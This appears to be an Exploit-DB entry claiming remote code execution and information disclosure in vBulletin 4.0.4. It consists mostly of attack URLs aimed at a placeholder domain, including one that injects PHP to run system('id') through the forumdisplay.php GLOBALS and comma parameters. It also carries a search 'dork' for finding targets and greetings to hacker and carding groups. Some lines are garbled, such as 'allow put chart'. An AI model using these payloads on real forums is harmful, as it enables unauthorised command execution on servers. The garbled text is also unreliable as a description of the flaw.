vbbuletin 4.0.4 - Multiple Vulnerabilities

EDB-ID:

14686

CVE:

N/A




Platform:

PHP

Date:

2010-08-19


/*======================================================================*\
|| #################################################################### ||
|| # Vurnerebility vBulletin - http://www.vbulletin.org               # ||
|| # Local or adserver Javascript,forumdisplay.php" Code Execution    # ||
|| # Version license 4.0.4					      # ||
|| # info set cookies, error issue & critical-information-disclosure  # ||
|| # Dork powered by vBulletin 4.0.4				      # ||
|| # author mc2_s3lector					      # ||
|| # Contact|http://www.yogyacarderlink.web.id			      # ||
|| #################################################################### ||
\*======================================================================*/
                         
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

/*======================================================================*\
|# #####################################################################  |
 # gretz: all family(www.yogyacarderlink.web.id)			# |			 
|# v3n0m,m4rc0,eidelweis,Joglo,setanmuda,z0mb13,byebye,93l4p_9uL1t@,	# |
|# IdioT_InsidE,dewancc,craxboy90,lingga,horcux,artupas,s0ul_34t3r,	# |
|# mywisdom,Travis,a9d1co0L,L4zyb0i,Jastis & all  			# |
|# KeDaiComputerworks.org						# |
|# my bro one-d4y,elpaci4n0,Ariwira,h3ndry_Slank,raven_ville, t3j0,& all# |				   		   
|# Indesign Computer Care,logcode.net,flowerjingga,.alboraaq.com	# | 
|  #####################################################################  |
\*======================================================================*/